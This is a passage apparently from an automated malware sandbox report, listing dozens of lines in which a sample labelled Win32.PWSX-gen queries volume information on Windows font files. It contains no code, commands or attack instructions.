Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
